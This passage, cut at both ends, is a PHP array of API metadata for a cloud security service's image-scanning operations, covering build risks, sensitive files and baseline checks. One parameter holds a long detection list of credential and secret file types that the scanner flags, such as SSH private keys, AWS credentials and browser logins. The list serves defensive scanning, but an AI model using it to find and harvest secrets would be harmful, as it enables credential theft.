'string', 'example' => '39010****', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'namespace', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'test-tepo', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => 'a5ccdd9b166b67e02954aa9b618fe19b7968bd56a15463d2ad7f2643ba5b****', 'title' => ''], 'Tag' => ['description' => 'The tag of the image.', 'type' => 'string', 'example' => 'v1', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723710827000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723710827999', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" .'- **medium**'."\n" .'- **low**.', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Status' => ['description' => 'The status of the alert event to query. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Ignored.'."\n" .'- **2**: False positive.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in paging query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '109', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query affected images by build risk with paging', 'summary' => 'Queries affected images by build risk with paging.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListByBuildRisk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageListByBuildRisk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"List\\": [\\n {\\n \\"Uuid\\": \\"6ec898e6274f942e0e4a053eff1c****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"InstanceId\\": \\"39010****\\",\\n \\"RepoNamespace\\": \\"namespace\\",\\n \\"RepoName\\": \\"test-tepo\\",\\n \\"Digest\\": \\"a5ccdd9b166b67e02954aa9b618fe19b7968bd56a15463d2ad7f2643ba5b****\\",\\n \\"Tag\\": \\"v1\\",\\n \\"FirstScanTime\\": 1723710827000,\\n \\"LastScanTime\\": 1723710827999,\\n \\"RiskLevel\\": \\"medium\\",\\n \\"Status\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 109\\n }\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\"\\n}","type":"json"}]', ], 'DescribeImageListBySensitiveFile' => [ 'summary' => 'Queries information about images affected by sensitive files.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '156728', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SensitiveFileKey', 'in' => 'query', 'schema' => ['description' => 'The type of sensitive file alert. Valid values:'."\n" ."\n" .'- **npm_token**: NPM access token'."\n" .'- **ftp_cfg**: FTP configuration'."\n" .'- **google\\_oauth_key**: Google OAuth Key'."\n" .'- **planetscale_passwd**: Planetscale password'."\n" .'- **github\\_ssh_key**: GitHub SSH key'."\n" .'- **msbuild\\_publish_profile**: MSBuild publish profile'."\n" .'- **fastly\\_cdn_token**: Fastly CDN token'."\n" .'- **ssh\\_private_key**: SSH private key'."\n" .'- **aws_cli**: AWS CLI credentials'."\n" .'- **cpanel_proftpd**: cPanel ProFTPd credentials'."\n" .'- **postgresql_passwd**: PostgreSQL password file'."\n" .'- **discord\\_client_cred**: Discord client credentials'."\n" .'- **rails_database**: Rails database configuration'."\n" .'- **aws\\_access_key**: AWS Access Key'."\n" .'- **esmtp_cfg**: ESMTP mail server configuration'."\n" .'- **docker\\_registry_cfg**: Docker image registry configuration'."\n" .'- **pem**: PEM'."\n" .'- **common_cred**: Common credentials'."\n" .'- **sftp_cfg**: SFTP connection configuration'."\n" .'- **grafana_token**: Grafana token'."\n" .'- **slack_token**: Slack Token'."\n" .'- **ec\\_private_key**: EC private key'."\n" .'- **pypi_token**: PyPI upload token'."\n" .'- **finicity_token**: Finicity platform token'."\n" .'- **k8s\\_client_key**: Kubernetes client private key'."\n" .'- **git_cfg**: Git configuration'."\n" .'- **django_key**: Django key'."\n" .'- **jenkins_ssh**: Jenkins SSH configuration file'."\n" .'- **openssh\\_private_key**: OpenSSH private key'."\n" .'- **square_oauth**: Square OAuth credentials'."\n" .'- **typeform_token**: Typeform token'."\n" .'- **common\\_database_cfg**: Common database connection configuration'."\n" .'- **wordpress\\_database_cfg**: WordPress database configuration'."\n" .'- **googlecloud\\_api_key**: Google Cloud API Key'."\n" .'- **vscode_sftp**: VSCode SFTP configuration'."\n" .'- **apache_htpasswd**: Apache htpasswd'."\n" .'- **planetscale_token**: Planetscale token'."\n" .'- **contentful\\_preview_token**: Contentful Preview token'."\n" .'- **php\\_database_cfg**: PHP application database password'."\n" .'- **atom\\_remote_sync**: Atom remote sync configuration'."\n" .'- **aws\\_session_token**: AWS session token'."\n" .'- **atom\\_sftp_cfg**: Atom SFTP configuration'."\n" .'- **asana\\_client\\_private_key**: Asana project management platform client key'."\n" .'- **tencentcloud_ak**: Third-party cloud SecretId'."\n" .'- **rsa\\_private_key**: RSA private key'."\n" .'- **github\\_personal_token**: GitHub Personal access token'."\n" .'- **pgp**: PGP encrypted file'."\n" .'- **stripe_skpk**: Stripe Secret Key'."\n" .'- **square_token**: Square access token'."\n" .'- **rails_carrierwave**: Rails Carrierwave file upload credentials'."\n" .'- **dbeaver\\_database_cfg**: DBeaver database configuration'."\n" .'- **robomongo_cred**: Robomongo credentials'."\n" .'- **github\\_oauth_token**: GitHub OAuth access token'."\n" .'- **pulumi_token**: Pulumi token'."\n" .'- **ventrilo_voip**: Ventrilo VoIP Server configuration'."\n" .'- **macos\\_keychain**: macOS Keychain'."\n" .'- **amazon\\_mws_token**: Amazon MWS Token'."\n" .'- **dynatrace_token**: Dynatrace token'."\n" .'- **java_keystore**: Java Keystore'."\n" .'- **microsoft_sdf**: Microsoft SQL CE database'."\n" .'- **kubernetes\\_dashboard_cred**: Kubernetes Dashboard user credentials'."\n" .'- **atlassian_token**: Atlassian token'."\n" .'- **rdp**: Remote Desktop Connection RDP'."\n" .'- **mailgun_key**: Mailgun Webhook Signing Key'."\n" .'- **mailchimp\\_api_key**: Mailchimp API Key'."\n" .'- **netrc_cfg**: .netrc configuration file'."\n" .'- **openvpn_cfg**: OpenVPN client configuration'."\n" .'- **github\\_refresh_token**: GitHub Refresh Token'."\n" .'- **salesforce**: Salesforce credentials'."\n" .'- **sendinblue**: Sendinblue token'."\n" .'- **pkcs\\_private_key**: PKCS#12 key'."\n" .'- **rubyonrails_passwd**: Ruby on Rails password file'."\n" .'- **filezilla_ftp**: FileZilla FTP configuration'."\n" .'- **databricks_token**: Databricks token'."\n" .'- **gitLab\\_personal_token**: GitLab Personal access token'."\n" .'- **rails\\_master_key**: Rails Master Key'."\n" .'- **sqlite**: SQLite3/SQLite database'."\n" .'- **firefox_logins**: Firefox login configuration'."\n" .'- **mailgun\\_private_token**: Mailgun Private token'."\n" .'- **joomla_cfg**: Joomla configuration'."\n" .'- **hashicorp\\_terraform_token**: HashiCorp Terraform Token'."\n" .'- **jetbrains_ides**: JetBrains IDEs configuration'."\n" .'- **heroku\\_api_key**: Heroku API key'."\n" .'- **messagebird_token**: MessageBird token'."\n" .'- **github\\_app_token**: GitHub App Token'."\n" .'- **hashicorp\\_vault_token**: HashiCorp Vault Token'."\n" .'- **pgp\\_private_key**: PGP private key'."\n" .'- **sshpasswd**: SSH password'."\n" .'- **huaweicloud_ak**: Third-party cloud Secret Access Key'."\n" .'- **aws_s3cmd**: AWS S3cmd configuration'."\n" .'- **php_config**: PHP configuration'."\n" .'- **common\\_private_key**: Common private key type'."\n" .'- **microsoft_mdf**: Microsoft SQL database'."\n" .'- **mediawiki_cfg**: MediaWiki configuration'."\n" .'- **jenkins_cred**: Jenkins credentials'."\n" .'- **rubygems_cred**: RubyGems credentials'."\n" .'- **clojars_token**: Clojars token'."\n" .'- **phoenix\\_web_passwd**: Phoenix Web credentials'."\n" .'- **puttygen\\_private_key**: PuTTYgen private key'."\n" .'- **google\\_oauth_token**: Google OAuth access token'."\n" .'- **rubyonrails_cfg**: Ruby on Rails database configuration'."\n" .'- **lob\\_api_key**: Lob API Key'."\n" .'- **pkcs_cred**: PKCS#12 certificate'."\n" .'- **otr\\_private_key**: OTR private key'."\n" .'- **contentful\\_delivery_token**: Contentful Delivery token'."\n" .'- **digital\\_ocean_tugboat**: Digital Ocean Tugboat configuration'."\n" .'- **dsa\\_private_key**: DSA private key'."\n" .'- **rails\\_app_token**: Rails App token'."\n" .'- **git_cred**: Git user credentials'."\n" .'- **newrelic\\_api_key**: New Relic User API Key'."\n" .'- **github_hub**: Hub configuration storing GitHub tokens'."\n" .'- **rubygem**: RubyGem token', 'type' => 'string', 'required' => false, 'example' => 'sshpasswd', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The collection of scan scopes. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'array', 'items' => ['description' => 'The collection of scan scopes. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Sets the language type for request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to return. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paginated query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level of the file. Separate multiple levels with commas (,). Valid values:'."\n" ."\n" .'- **high**: High risk.'."\n" .'- **medium**: Medium risk.'."\n" .'- **low**: Low risk.', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container image instance.'."\n" .'> You can call the [ListRepository](~~451339~~) operation of Container Registry to obtain the container image instance ID from the **InstanceId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'i-qewqrqcsadf****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.'."\n" .'> Fuzzy search is supported.', 'type' => 'string', 'required' => false, 'example' => 'harbor-image-v001', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.'."\n" .'> Fuzzy search is supported.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The image digest.'."\n" .'> Fuzzy search is supported.', 'type' => 'string', 'required' => false, 'example' => 'v005', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the sensitive file. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Ignored.'."\n" .'- **2**: False positive.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response for querying affected images.', 'type' => 'object', 'properties' => [ 'ImageInfos' => [ 'description' => 'The list of image information.', 'type' => 'array', 'items' => [ 'description' => 'The image information.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The unique identifier of the image.', 'type' => 'string', 'example' => 'f58681174f944623345379e23b7b****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the image instance.', 'type' => 'string', 'example' => 'cri-a595qp31knh9****', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'libssh2', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'opa-test', 'title' => ''], 'Digest' => ['description' => 'The image digest.', 'type' => 'string', 'example' => 'v005', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'nuxeo6', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High risk.'."\n" .'- **medium**: Medium risk.'."\n" .'- **low**: Low risk.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'Status' => ['description' => 'The status of the sensitive file. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Ignored.'."\n" .'- **2**: False positive.', 'type' => 'string', 'example' => '0', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'sec-NessusSc', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of alert events displayed per page in a paginated query. Default value: **20**, indicating that 20 alert events are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '83', 'title' => ''], 'Count' => ['description' => 'The number of entries displayed on the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'LastRowKey' => ['description' => 'The key of the last entry.', 'type' => 'string', 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4NjE=', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'The result status of the API call. Valid values:'."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'E0C5C07F-1576-509A-AE44-1C36B8445B37', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query images with sensitive files', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListBySensitiveFile'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageListBySensitiveFile', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ImageInfos\\": [\\n {\\n \\"Uuid\\": \\"f58681174f944623345379e23b7b****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"InstanceId\\": \\"cri-a595qp31knh9****\\",\\n \\"RepoNamespace\\": \\"libssh2\\",\\n \\"RepoName\\": \\"opa-test\\",\\n \\"Digest\\": \\"v005\\",\\n \\"Tag\\": \\"nuxeo6\\",\\n \\"FirstScanTime\\": 1649814050000,\\n \\"LastScanTime\\": 1649814050000,\\n \\"RiskLevel\\": \\"low\\",\\n \\"Status\\": \\"0\\",\\n \\"InstanceName\\": \\"sec-NessusSc\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 83,\\n \\"Count\\": 4,\\n \\"LastRowKey\\": \\"CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4NjE=\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"E0C5C07F-1576-509A-AE44-1C36B8445B37\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DescribeImageListWithBaselineName' => [ 'summary' => 'Queries the details of image baseline check results.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92110', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BaselineNameKey', 'in' => 'query', 'schema' => ['description' => 'The name of the image baseline check result.', 'type' => 'string', 'required' => true, 'example' => 'ak_leak', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The query condition for the baseline.', 'type' => 'string', 'required' => false, 'example' => 'Unauthorized access', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The query type for the baseline. Valid values:'."\n" ."\n" .'- **BaselineNameAlias**: baseline name'."\n" .'- **BaselineClassAlias**: baseline category.', 'type' => 'string', 'required' => false, 'example' => 'BaselineNameAlias', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'i-qewqrqcsadf****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The SHA256 value of the image digest.', 'type' => 'string', 'required' => false, 'example' => '2e6daffce524ffeae66cccaa90c8fc47de912346dcec295c27395b6d66db6423', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings for paged query paging. The number of image baseline check result details to display per page. Default value: **10**, which indicates that 10 image baseline check result details are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cc20a1024011c44b6a8710d6f8b****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'ContainerId', 'in' => 'query', 'schema' => ['description' => 'The container ID.', 'type' => 'string', 'required' => false, 'example' => 'c08d5fc1a329a4b88950a253d082f****', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.', 'type' => 'string', 'required' => false, 'example' => 'docker-law', 'title' => ''], ], [ 'name' => 'Pod', 'in' => 'query', 'schema' => ['description' => 'The pod.', 'type' => 'string', 'required' => false, 'example' => '22222-7xsqq', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace.', 'type' => 'string', 'required' => false, 'example' => 'test-002', 'title' => ''], ], [ 'name' => 'Image', 'in' => 'query', 'schema' => ['description' => 'The container image name.', 'type' => 'string', 'required' => false, 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '5B8C2156-2DB9-5A42-99E7-F2ED5AE9EA1F', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information for the paged query results.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'Settings for paging in a paged query. The number of image baseline check results to display per page. Default value: **10**, which indicates that 10 image baseline check results are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of images that have baseline risks in the image baseline check.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of images that have baseline risks on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageInfos' => [ 'description' => 'The list of image information.', 'type' => 'array', 'items' => [ 'description' => 'The details of the image baseline check result.', 'type' => 'object', 'properties' => [ 'MiddleRiskImage' => ['description' => 'The number of images with a **medium** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether the image has security risks. Valid values:'."\n" ."\n" .'- **YES**: The image has risks.'."\n" .'- **NO**: The image does not have risks.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'ImageCreate' => ['description' => 'The timestamp when the image was created, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636962328000', 'title' => ''], 'Digest' => ['description' => 'The SHA256 value of the image digest.', 'type' => 'string', 'example' => '2e6daffce524ffeae66cccaa90c8fc47de912346dcec295c27395b6d66db6423', 'title' => ''], 'Tag' => ['description' => 'The version of the image.', 'type' => 'string', 'example' => 'v1', 'title' => ''], 'ImageUpdate' => ['description' => 'The timestamp when the image was updated, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636974116000', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the image instance.', 'type' => 'string', 'example' => 'cri-a595qp31knh9****', 'title' => ''], 'LowRiskImage' => ['description' => 'The number of images with a **low** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RepoType' => ['description' => 'The type of the image repository.', 'type' => 'string', 'example' => 'PRIVATE', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image instance.', 'type' => 'string', 'example' => 'cn-beijing', 'title' => ''], 'Uuid' => ['description' => 'The unique identifier of the image.', 'type' => 'string', 'example' => 'f58681174f944623345379e23b7b****', 'title' => ''], 'ImageSize' => ['description' => 'The size of the image.', 'type' => 'integer', 'format' => 'int32', 'example' => '157408623', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'crr-1lt6q7167yh6****', 'title' => ''], 'TotalItemCount' => ['description' => 'The total number of baseline risk items in the image.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'HighRiskImage' => ['description' => 'The number of images with a **high** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NoRiskImage' => ['description' => 'The number of images that do not have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageId' => ['description' => 'The ID of the image.', 'type' => 'string', 'example' => 'cddb5fd33b34a1fabb358d0a19497cdfe362fe624821cb250947af0ea5cc****', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'scanner', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c08d5fc1a329a4b88950a253d082f1****', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'docker-law', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'libssh2', 'title' => ''], 'Pod' => ['description' => 'The pod.', 'type' => 'string', 'example' => '22222-7xsqq', 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'test-002', 'title' => ''], 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****', 'title' => ''], 'Image' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'pre.mongo-196', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '47.96.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'spod', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => 'm-bp17m0pc0xprzbwo****', 'title' => ''], 'TargetType' => ['description' => 'The object type of the scan target. Valid values:'."\n" ."\n" .'- ** ECS_IMAGE**: image.'."\n" .'- ** ECS_SNAPSHOT**: snapshot.', 'type' => 'string', 'example' => 'ECS_IMAGE', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan, in milliseconds.', 'type' => 